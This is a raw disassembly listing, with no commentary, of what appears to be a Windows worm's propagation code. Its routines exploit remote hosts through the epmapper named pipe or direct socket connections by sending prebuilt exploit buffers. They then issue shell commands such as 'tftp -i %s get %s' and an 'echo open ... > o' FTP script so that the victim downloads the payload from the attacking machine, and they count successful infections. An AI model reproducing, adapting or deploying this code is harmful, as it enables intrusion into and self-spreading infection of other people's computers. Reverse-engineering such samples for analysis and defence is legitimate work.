var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_427B6C
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_427B64 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, ds:byte_43C80C
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_424070 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
add esp, 10h
loc_402B5D: ; CODE XREF: sub_402ACC+AF�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call ds:dword_43F5A8
test eax, eax
jz short loc_402B7D
push 7D0h
call ds:dword_424064 ; Sleep
jmp short loc_402B5D
; ---------------------------------------------------------------------------
loc_402B7D: ; CODE XREF: sub_402ACC+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_402ACC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B84 proc near ; CODE XREF: sub_402DD7+A9�p
; sub_402DD7+1E7�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_417B30
push esi
push edi
push offset byte_42F678
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_416BCB
mov edi, eax
add esp, 10h
test edi, edi
jz loc_402DD3
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_417390
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417330
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_417390
add esp, 24h
lea esi, [edi+0D7h]
loc_402C09: ; CODE XREF: sub_402B84+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_402C59
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_417390
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417330
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_417390
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_402C09
; ---------------------------------------------------------------------------
loc_402C59: ; CODE XREF: sub_402B84+90�j
cmp [ebp+arg_C4], 0
jz short loc_402C74
cmp [ebp+arg_C0], 3
jz short loc_402C7D
cmp [ebp+arg_C0], 0
jmp short loc_402C7B
; ---------------------------------------------------------------------------
loc_402C74: ; CODE XREF: sub_402B84+DC�j
cmp [ebp+arg_C0], 3
loc_402C7B: ; CODE XREF: sub_402B84+EE�j
jnz short loc_402C86
loc_402C7D: ; CODE XREF: sub_402B84+E5�j
push 4
push offset dword_427B60
jmp short loc_402C8D
; ---------------------------------------------------------------------------
loc_402C86: ; CODE XREF: sub_402B84:loc_402C7B�j
push 4
push offset dword_427B5C
loc_402C8D: ; CODE XREF: sub_402B84+100�j
lea eax, [ebp+var_1FE0]
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_427694
push eax
call sub_417390
push 10h
lea eax, [ebp+var_CA4]
push offset dword_4279F8
push eax
call sub_417390
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_417390
lea edi, [esi+370h]
push 3Ch
push offset off_427A0C
lea eax, [ebp+edi+var_1004]
push eax
call sub_417390
add edi, 3Ch
push 30h
push offset dword_427A4C
lea eax, [ebp+edi+var_1004]
push eax
call sub_417390
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_417B89
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_417330
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_417390
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_402DD3: ; CODE XREF: sub_402B84+3E�j
pop edi
pop esi
leave
retn
sub_402B84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DD7 proc near ; CODE XREF: sub_407767+1EA�p
; DATA XREF: _2:off_42ACB4�o
var_1338 = byte ptr -1338h
var_338 = byte ptr -338h
var_138 = byte ptr -138h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
mov eax, 1338h
call sub_417B30
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_402F45
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_4029E9
pop ecx
test eax, eax
pop ecx
jz loc_403055
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_138]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_4172AE
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_138]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_402E5C
loc_402E4D: ; CODE XREF: sub_402DD7+126�j
lea eax, [ebp+arg_4]
push eax
call sub_402ACC
pop ecx
jmp loc_403055
; ---------------------------------------------------------------------------
loc_402E5C: ; CODE XREF: sub_402DD7+74�j
lea eax, [ebp+arg_4]
push 2
push eax
call sub_40D4C5
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_402B84
add esp, 0C8h
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_402EF4
mov edi, 186A0h
push edi
call sub_417B89
mov esi, eax
push edi
push ebx
push esi
call sub_417330
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_427648
push [ebp+var_4]
call ds:dword_424080 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_402EE4
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_42407C ; WriteFile
test eax, eax
jnz short loc_402F02
loc_402EE4: ; CODE XREF: sub_402DD7+F3�j
push esi
call sub_417C3B
push [ebp+var_8]
call sub_417C3B
pop ecx
pop ecx
loc_402EF4: ; CODE XREF: sub_402DD7+B9�j
push [ebp+var_4]
call ds:off_424078
jmp loc_402E4D
; ---------------------------------------------------------------------------
loc_402F02: ; CODE XREF: sub_402DD7+10B�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
call ds:off_424074
push [ebp+var_8]
mov edi, eax
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push [ebp+var_4]
call ds:off_424078
lea eax, [ebp+arg_4]
push eax
call sub_402ACC
cmp edi, 1
pop ecx
jnz loc_403066
jmp loc_403055
; ---------------------------------------------------------------------------
loc_402F45: ; CODE XREF: sub_402DD7+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_40D4C5
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_403055
xor ebx, ebx
push ebx
push 1
push 2
call ds:dword_43F6E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_403055
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+arg_A0]
call ds:dword_43F668 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_402B84
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_402FD7
push [ebp+var_4]
jmp short loc_40304F
; ---------------------------------------------------------------------------
loc_402FD7: ; CODE XREF: sub_402DD7+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_402FEF
loc_402FEC: ; CODE XREF: sub_402DD7+22A�j
push esi
jmp short loc_403048
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402DD7+213�j
push ebx
push 48h
push offset dword_427648
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_402FEC
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
push ebx
push [ebp+var_C]
push [ebp+var_8]
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403030
push [ebp+var_8]
jmp short loc_403048
; ---------------------------------------------------------------------------
loc_403030: ; CODE XREF: sub_402DD7+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_403059
loc_403048: ; CODE XREF: sub_402DD7+216�j
; sub_402DD7+257�j
call sub_417C3B
pop ecx
push edi
loc_40304F: ; CODE XREF: sub_402DD7+1FE�j
call ds:dword_43F700 ; closesocket
loc_403055: ; CODE XREF: sub_402DD7+31�j
; sub_402DD7+80�j ...
xor eax, eax
jmp short loc_4030C7
; ---------------------------------------------------------------------------
loc_403059: ; CODE XREF: sub_402DD7+26F�j
call sub_417C3B
pop ecx
push edi
call ds:dword_43F700 ; closesocket
loc_403066: ; CODE XREF: sub_402DD7+163�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_338]
push offset unk_427B78
push eax
call sub_4172AE
add esp, 0Ch
loc_40307E: ; CODE XREF: sub_402DD7+2C7�j
lea eax, [ebp+var_338]
push eax
call sub_40C04D
test eax, eax
pop ecx
jnz short loc_4030A2
push 1388h
call ds:dword_424064 ; Sleep
inc ebx
cmp ebx, 6
jl short loc_40307E
jmp short loc_4030C4
; ---------------------------------------------------------------------------
loc_4030A2: ; CODE XREF: sub_402DD7+2B6�j
lea eax, [ebp+var_338]
push eax
call sub_40BF6D
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_4030C4: ; CODE XREF: sub_402DD7+2C9�j
push 1
pop eax
loc_4030C7: ; CODE XREF: sub_402DD7+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_402DD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030CC proc near ; DATA XREF: _2:00426004�o
jmp $+5
sub_4030CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4030D1 proc near
push 0BB80h
push 76Ch
call sub_41544E
pop ecx
mov ds:dword_43C810, eax
pop ecx
retn
sub_4030D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030E8 proc near ; CODE XREF: sub_403249+42A�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_C], eax
mov ax, word ptr ds:dword_43C810
push eax
call ds:dword_43F668 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_43F6E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403222
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz loc_403222
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call ds:dword_43F680 ; recv
mov esi, offset byte_42F678
push esi
push esi
push [ebp+arg_0]
call sub_40AEE0
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 18h
push esi
push esi
push ds:dword_43C83C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403222
push 1F4h
call ds:dword_424064 ; Sleep
push esi
push offset dword_428598
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403226
loc_403222: ; CODE XREF: sub_4030E8+51�j
; sub_4030E8+67�j ...
xor al, al
jmp short loc_403244
; ---------------------------------------------------------------------------
loc_403226: ; CODE XREF: sub_4030E8+138�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call ds:dword_43F680 ; recv
push ebx
call ds:dword_43F700 ; closesocket
mov al, 1
loc_403244: ; CODE XREF: sub_4030E8+13C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403249 proc near ; CODE XREF: _0:004037AD�p _0:004037CF�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_417B30
mov eax, ds:dword_428634
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_428638
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset loc_428628
push eax
call sub_4172AE
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_403288: ; CODE XREF: sub_403249+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_403288
push 60h
lea eax, [ebp+var_B4]
push offset dword_4280B8
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_417390
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_0+3)
push eax
call sub_417AB0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_417390
mov ax, word ptr ds:dword_43C810
add esp, 2Ch
push eax
call ds:dword_43F668 ; htons
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_427DB8
call sub_417390
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_403445
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_417330
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_4284E0[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_417390
mov esi, offset loc_427D08
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_417390
push 4
lea eax, [ebp+var_11AC]
push offset loc_428620
push eax
call sub_417390
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_417390
add esp, 40h
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_417390
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_4033FE: ; CODE XREF: sub_403249+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_4033FE
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_417330
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_417330
add esp, 18h
jmp short loc_40349C
; ---------------------------------------------------------------------------
loc_403445: ; CODE XREF: sub_403249+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_417330
mov esi, offset loc_427D08
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_417390
lea eax, [ebp+var_10]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_417390
mov eax, ds:dword_4284E0
add esp, 2Ch
mov [ebp+var_768], eax
loc_40349C: ; CODE XREF: sub_403249+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_417330
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4034DB
loc_4034D4: ; CODE XREF: sub_403249+2B9�j
; sub_403249+2E0�j ...
xor al, al
jmp loc_403683
; ---------------------------------------------------------------------------
loc_4034DB: ; CODE XREF: sub_403249+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
push ebx
push 68h
push offset dword_42811C
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
push ebx
push 0A0h
push offset dword_428188
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
cmp [ebp+arg_C0], ebx
jz loc_4035F1
push 68h
lea eax, [ebp+var_89B4]
push offset dword_428340
push eax
call sub_417390
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_417390
push 70h
lea eax, [ebp+var_68DC]
push offset dword_4283AC
push eax
call sub_417390
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_417390
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_428420
push eax
call sub_417390
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43F680 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_403647
; ---------------------------------------------------------------------------
loc_4035F1: ; CODE XREF: sub_403249+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_42822C
push eax
call sub_417390
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_417390
push 90h
lea eax, [ebp+var_245C]
push offset off_4282AC
push eax
call sub_417390
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_403647: ; CODE XREF: sub_403249+3A6�j
push eax
push edi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz loc_4034D4
push 12Ch
call ds:dword_424064 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4030E8
add esp, 0BCh
test al, al
setnz al
loc_403683: ; CODE XREF: sub_403249+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_403249 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_41544E
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_417330
add esp, 14h
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call ds:dword_43F6A8 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call ds:dword_43F668 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call ds:dword_43F6E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403790
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz loc_403790
push edi
push 89h
push offset dword_427EA0
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
mov esi, 640h
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
push edi
push 0A8h
push offset dword_427F2C
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
push edi
push 0DEh
push offset dword_427FD8
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40379A
dec eax
jz short loc_403797
loc_403790: ; CODE XREF: _0:004036EB�j _0:00403701�j ...
xor eax, eax
jmp loc_403817
; ---------------------------------------------------------------------------
loc_403797: ; CODE XREF: _0:0040378E�j
push edi
jmp short loc_4037BE
; ---------------------------------------------------------------------------
loc_40379A: ; CODE XREF: _0:0040378B�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403249
add esp, 0C4h
test al, al
jnz short loc_4037DE
push 1
loc_4037BE: ; CODE XREF: _0:00403798�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403249
add esp, 0C4h
test al, al
jz short loc_4037E5
loc_4037DE: ; CODE XREF: _0:004037BA�j
mov dword ptr [ebp-4], 1
loc_4037E5: ; CODE XREF: _0:004037DC�j
push ebx
call ds:dword_43F700 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_403814
lea eax, [ebp-854h]
push eax
call sub_40BF6D
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_403814: ; CODE XREF: _0:004037F0�j
push 1
pop eax
loc_403817: ; CODE XREF: _0:00403792�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40381C proc near ; CODE XREF: sub_403A90+E�p
; sub_403A90+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40381C endp
; =============== S U B R O U T I N E =======================================
sub_403826 proc near ; CODE XREF: sub_403A90+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jz short loc_403858
push ebx
push 0
push edi
call sub_417330
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_417390
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_403858: ; CODE XREF: sub_403826+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_403826 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403860 proc near ; CODE XREF: sub_40395A+18�p
; sub_4039D4+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jz short loc_4038AC
push edi
push 0
push esi
call sub_417330
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_417390
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_417390
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_4038AC: ; CODE XREF: sub_403860+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_403860 endp
; =============== S U B R O U T I N E =======================================
sub_4038B5 proc near ; CODE XREF: sub_40395A+5E�p
; sub_40395A+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4038C5
push eax
call sub_417C3B
pop ecx
loc_4038C5: ; CODE XREF: sub_4038B5+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_4038B5 endp
; =============== S U B R O U T I N E =======================================
sub_4038CE proc near ; CODE XREF: sub_40395A+20�p
; sub_403A35+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4038FB
xor ebx, ebx
cmp eax, 7Fh
setnl bl
